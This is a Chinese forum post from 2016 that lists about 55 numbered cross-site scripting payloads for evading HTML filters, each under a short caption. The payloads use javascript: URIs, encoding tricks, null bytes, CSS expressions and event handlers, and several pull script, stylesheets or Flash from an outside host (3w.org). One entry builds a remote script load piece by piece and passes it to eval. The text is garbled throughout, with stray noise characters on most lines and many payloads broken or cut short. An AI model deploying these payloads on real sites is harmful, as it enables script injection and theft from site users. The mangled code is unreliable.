(1)普通的XSS JavaScript注入7 F2 O8 |* e8 M1 u- [
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ l, E2 L: f' D2 M
(99)另类弹框! x. U1 h; N7 V( y o5 Z
<q/oncut=alert()>1
, ]) e# U0 T. y% A7 D<s/onclick=alert()>b
: X3 f1 k) y ~ S <XSS=" onclick="alert(1)//">clickme</SSX=">
! g7 l) [: V/ B$ _) |5 ^9 K <zzz onclick=alert`1`>clickme</zzz>
+ F2 q, w0 V) c1 S) c' i* Q% E <a onclick=alert`1`>clickme</a>
( [3 p1 e. {) _3 m<a=">clickme</a=">% E7 S, Y k% E- M0 x
<a=">clickme</a>
" }& o7 @+ _5 D/ q+ @0 a- e' E<z=">clickme</z=">
" |( i u1 x. m& V<z onclick=alert`1`>clickme</z>
% n, `2 M- k5 ^% j
' M$ |" ^5 l c. H0 V# G& @(2)IMG标签XSS使用JavaScript命令 `$ l. a/ I. S4 f
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' y, h3 Y; A5 j% p
! |8 t; D$ R% }% M9 r(3)IMG标签无分号无引号
+ H' c4 O6 c" F( j" I# P( F7 @<IMG SRC=javascript:alert(‘XSS’)>4 K* Y( }% |4 b3 e; T
2 m4 J+ @& x7 W5 z8 O(4)IMG标签大小写不敏感
$ i6 D+ Z+ f# O' Q! Y% D<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
8 P7 o2 p1 g/ v! r' f! {
- z6 I; i& ^2 J8 @(5)HTML编码(必须有分号)
' X9 w% F6 M1 n; t/ K* J<IMG SRC=javascript:alert(“XSS”)>
0 O; [+ g! e5 h& K5 |1 J. ~% K- L! M
(6)修正缺陷IMG标签
9 y3 g, H' ?( @! E<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
. T3 i3 y* R7 M/ ]5 z9 D. j% n8 x6 @" w* N0 F% y I0 H1 r" ~' x
(7)formCharCode标签(计算器)
' j8 T% w. [; X5 f+ p<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 D6 j- [$ S5 c' c$ L+ l* G, @) q$ U2 L( z7 Q v; b1 q
(8)UTF-8的Unicode编码(计算器): c: `- @% K. o& g) \1 s
<IMG SRC=jav..省略..S')>
- U% w0 N; E, z$ N: O/ n9 g; ^: f! F
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* Z. n; h7 a0 l) W* M, m" k, m
<IMG SRC=jav..省略..S')>% G# L5 N+ }, S' s, k" n
6 W+ g& v. ]0 I5 Q4 r. ?; l; ?
(10)十六进制编码也是没有分号(计算器)5 I/ X- c( z5 B8 j0 S: Y' b
<IMG SRC=\'#\'" /span>9 l' X R1 R* U# e6 Y ^' ^
4 R; n3 X4 C) F/ P3 m+ K$ A# H(11)嵌入式标签,将Javascript分开' x5 ~1 R) R% t& k Z! r
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ u/ Z" O$ f: o6 |' d7 B/ ?0 u8 ?- W6 F9 j3 H
(12)嵌入式编码标签,将Javascript分开
1 g6 `- a& G" \( J6 _<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
& p& i% ?. E" Q+ k9 \2 q/ s# m5 \: n% K. _
(13)嵌入式换行符/ `* E& a3 x" _4 @. f7 C
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
* p; Z( {: R, ]8 q; {* | `- ^+ T! S6 H1 _" F: c, V5 D& U
(14)嵌入式回车
" i! O, p$ W5 f1 ], U% g" g+ ~/ a<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 p9 j5 |2 ~' }' p3 k- N+ l7 E" A8 S o+ F
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 R% m+ B, O) `* ?8 t/ m% g/ w<IMG SRC=\'#\'" /span>% Q9 N1 Q1 [, q. n6 O/ s1 L
T6 ^: t3 T( {/ v6 D x+ z(16)解决限制字符(要求同页面)
r- M9 K! } A! s& z<script>z=’document.’</script>
& I/ q. P6 G1 r2 @( k- u: y" ]<script>z=z+’write(“‘</script>
/ R% M3 l2 l) H" Q( w* F7 E% X( n0 Z<script>z=z+’<script’</script>; m; @) Y0 T+ ?6 p2 w% D$ s
<script>z=z+’ src=ht’</script>+ E# y6 T1 @5 R0 i& g. _
<script>z=z+’tp://ww’</script>
" j |+ j5 m8 X# x" S<script>z=z+’w.shell’</script>
4 H) y# Z: C8 v+ A4 {+ s) J<script>z=z+’.net/1.’</script>) i# F0 `) ~2 [
<script>z=z+’js></sc’</script>* q6 A0 f: v5 [
<script>z=z+’ript>”)’</script>. V/ H& G8 }" F9 k
<script>eval_r(z)</script>! R0 G V# Z2 e+ C/ k7 I4 r* W8 O
5 A% t' t2 ~/ s' i9 X- Y( D) s(17)空字符
/ v# ]3 b5 I& k) O' Zperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out* ~9 ]( U5 c3 V
0 }( u. A H% Y2 H: u8 ~6 i(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 H" _3 x& y8 t, N/ a" sperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
- O v- @+ n/ g/ l$ M; e5 T: d# r6 b4 Z. v: g0 D/ H* S7 L+ [
(19)Spaces和meta前的IMG标签
3 g! P1 C, \0 f. p+ C- \; f<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>/ a5 t$ }5 W" v6 U6 i
3 k' V- L6 F0 {. b* G- X, M% B" I
(20)Non-alpha-non-digit XSS
' p3 H! e7 L! ]0 f! J. ?: M* [' S<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
X, Z3 c |. P2 @. {2 L2 D# i2 ^7 i3 }0 i* e+ h
(21)Non-alpha-non-digit XSS to 2) L! c( C5 I; B {& e1 z4 C2 L
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) M q9 w4 E+ O6 l6 A% \6 ^$ e
! p* A& p2 Z7 R2 ^ l(22)Non-alpha-non-digit XSS to 3% J2 c( q1 R5 q" l8 t j
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
" R2 \- J- h6 y! a1 G6 Z$ M: r8 d9 {
(23)双开括号1 b& B3 \' |! J" b# D# ]' `
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; {7 b6 g8 Q6 [3 @; P0 c. }$ G
(24)无结束脚本标记(仅火狐等浏览器)) Q) i5 W3 K! t
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>0 d4 e/ n. l" L. |% _, j2 t) D
/ C% m9 P: p) P5 @; ~ r(25)无结束脚本标记25 _3 ]5 A% d& G) F8 R/ e8 m( h9 V! C
<SCRIPT SRC=//3w.org/XSS/xss.js>
! m0 l5 M( ^ V- \5 A" _
1 T6 Y9 B( P6 ^) x% a(26)半开的HTML/JavaScript XSS2 m G: n- J' M
<IMG SRC=\'#\'" /span>' D8 l& k& U' B4 i* |
6 `7 e, k/ N: c( l- m2 _* [, @(27)双开角括号
1 `* ^2 M* I1 _! u$ C7 ?" U<iframe src=http://3w.org/XSS.html </ f$ X3 l: B# m, Q( r/ K; b) D
: n+ |1 A$ K- p' W! L* ]4 c, d- }- ^(28)无单引号 双引号 分号
: O" d! Z( K% n. f% t% n<SCRIPT>a=/XSS/
1 ?* S* v v! |7 X; ~+ C% Malert(a.source)</SCRIPT>
: F( s) {; y2 ]3 v, u, U5 L. R. s8 a% x$ E! b
(29)换码过滤的JavaScript# f* e) Y* l7 R, t0 s' h
\”;alert(‘XSS’);//) N% l2 e: G* M6 j4 X* z' M" s. ~
5 F& E6 E. R! O D(30)结束Title标签
9 y) e, Y; r- D# d6 h</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>, L& n: O* V0 r, `8 F' ]
( x( I* @+ r4 M
(31)Input Image
* J7 h; G2 b* F' ~/ Z<INPUT SRC=\'#\'" /span>
; z j% G0 }6 E9 [
" ^4 Z# H, _* J2 @( D8 e(32)BODY Image" a; O# [( W0 s' C( S5 P
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. E, }6 S/ E& M: ?4 Q
1 O5 W% q! X/ @, |
(33)BODY标签
5 h- `9 U( q4 Z% r( H, v. i" M<BODY(‘XSS’)>
/ O7 H q) t! r' d- `+ `/ S5 {4 c; D
(34)IMG Dynsrc
* V3 }# i" \1 W0 ~! z4 R% ]<IMG DYNSRC=\'#\'" /span>* i" b5 x4 |; @
G6 k V1 R% [7 w2 s9 w& w(35)IMG Lowsrc, x5 f2 L: V: i) N# X
<IMG LOWSRC=\'#\'" /span>
. z! w2 r) {; u8 ]" Q: z
, p3 y; Z1 [2 z, {4 B4 \3 Y(36)BGSOUND
0 C, W- I" d c k6 Q0 A<BGSOUND SRC=\'#\'" /span>
* j, Y0 b$ a' i- B9 e4 ]! P6 \8 y
(37)STYLE sheet
* [3 o1 E4 l/ B- _% F. a$ m<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 ?- S' \0 t+ V$ I: c+ d
- I$ H7 A) T/ ]" J1 \ d(38)远程样式表
|( J& d( u" H. p<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; v2 L9 H- Q* y1 T6 H2 e# J0 K& _5 r+ ], d/ w! D
(39)List-style-image(列表式)
1 [& V4 p7 h" F; h" N, I; Q5 x; i- F<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS$ J& J5 e) j! u" O& U
6 P% x \ i& h, m
(40)IMG VBscript
/ [6 G: o4 \ x- d1 T<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
0 [, _0 Z) B: u/ ]
: {$ e% x& |( |" _' q3 k0 F(41)META链接url
- j; u. ]/ z! Z4 s. p<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>" ~- I0 C5 y" q: [& t/ V5 `3 j& V
; ]! h0 n) g6 i6 B5 d(42)Iframe
- T- ?% A. t" l1 X8 d2 Q$ H<IFRAME SRC=\'#\'" /IFRAME> `( J2 L6 g5 M
/ U6 P+ U) w: p(43)Frame4 U' d' I6 S: @9 r9 y o
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
+ M F0 J L. k5 E' {1 O6 ]& l5 h5 i# Y7 Q5 k" }& R+ B! F4 K
(44)Table& `! M/ D4 B$ Q: J' g' H) Q
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
% n" l: T5 q/ A6 q5 D6 b7 v6 {' h
(45)TD
, g( ?) X: o3 ?8 T [! K2 o<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”> p i& D, Q/ s1 `& H- c
1 d+ n0 x* S* K$ j(46)DIV background-image
$ C: Q9 P# g1 k2 b4 Y! N<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. B2 l# Z J" h( ?' y7 n n
/ s& Q- b; c, C* ^2 ~(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 z6 C2 C0 ^/ x F, P& A
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>! V* a) i9 p8 H+ p: D4 @
' t7 `4 |0 ?) P3 C6 t(48)DIV expression8 z8 B' k* R! }
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
9 r& b5 ?6 C$ [' @
Z J1 e6 I# t4 u(49)STYLE属性分拆表达
8 `; R0 X3 H2 ^0 r8 K+ d9 A7 v<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
/ b, v0 R! C* M/ j1 N7 F0 ^
' A1 d: a2 E7 o. z, D) }(50)匿名STYLE(组成:开角号和一个字母开头)
0 t" }% C7 f4 Y9 _0 M<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>- T' V1 \2 W8 ?7 D
% ]- L: ^2 m7 ^3 I$ c* O2 l
(51)STYLE background-image8 S0 K$ p( C/ e: [- `
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>4 N5 C1 m5 `0 S. T& U! h5 j
* U, E8 y# p% K0 ~ M(52)IMG STYLE方式( S; ^- t2 X# G$ i- H" @# e
exppression(alert(“XSS”))’>
- T2 M4 b! Y& {+ r8 G& F7 s8 U- ?, c9 j7 |
(53)STYLE background% c% V3 g3 L7 x% u: M
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
/ n7 L% H. v, f5 g, a+ z
! B7 \- J1 R. a1 N# r(54)BASE$ ~! C7 k# R- j4 @' @: E
<BASE HREF=”javascript:alert(‘XSS’);//”>; Y1 E% W8 O4 B, t; H _
7 M9 L1 t6 m9 ~% ^3 r% d(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: f" F: X( g: Y) M: j
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>7 L, G9 _$ P. I2 u/ M% ?; d
|
发表于 2016-4-28 10:06:15
收藏
支持
反对